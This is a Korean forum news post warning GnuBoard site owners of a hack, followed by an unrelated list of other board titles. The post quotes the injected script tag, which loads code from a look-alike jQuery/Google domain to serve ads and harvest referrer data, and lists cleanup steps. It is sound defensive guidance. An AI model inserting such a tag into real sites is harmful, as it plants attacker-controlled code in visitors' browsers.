• 회원가입
  • 로그인
  • 구글아이디로 로그인

[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

2,632  

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.


<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

  • 그누보드를 최신버전으로 업그레이드
  • 백신으로 PC 검사
  • 최고관리자 패스워드 변경
  • FTP 및 DB 비밀번호 변경
  • FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736


분류 제목
sports 카타르, 승부차기로 우즈베키스탄 제압하고 2023 아시안컵 4강 진출
sports 대한민국이 속한 카타르 월드컵 H조 동상동몽
talk 헐, 그새 PHP 버전이 8.2가 넘었군요.
dance 칠리치크 ChilliCheek 다희 님 - 위아래, 아이스크림, Lip&Hip, Emergency 댄스 버스…
dance 소울 SOUL 리하 님 - 뉴진스 OMG 오엠지 [댄스/누나]
girl 찐며든사랑 님의 힘숨찐 댄스
talk 중국의 대한민국 분열책 (= 이간질 뒷공작 = 이이제이 정책)
dance 1CHU 원츄 채린 님 - 사이렌 댄스 버스킹 [누나]
sports 손흥민 1골 1어시 맹활약 (리그 7호골)
girl 코딩 하다 막힐 때 보면 좋은 누나
sports 레이디비 (LADYB) 시온(SiOn) 님 '내가 제일 잘 나가' 댄스 버스킹 [누나]
sports 23/24 (7R) (토트넘 : 리버풀) 경기 VAR 오심으로 재경기 요구 시끌
talk 부산에 큰불이 났었네요.
sports 23/24 (7R) 토트넘 : 리버풀 VAR 오심 발생 원인
site 아미나 베스트 사이트 모음 [3레벨] 
dance 버스터즈 BUSTERS 민지 님 - 씨스타 SHAKE IT 저팔계 댄스
sports 마요르카 이강인, 본인을 내친 친정팀 발렌시아에 일격
girl 이예빈 치어리더 님 그냥 왔다 가는 영상
dance 머리부터 발 끝까지~?뒷말 뭔데? 댄스
sports 맨유, 리버풀에 7:0 대패 개박살났네요.
24/163
목록
찾아주셔서 감사합니다. Since 2012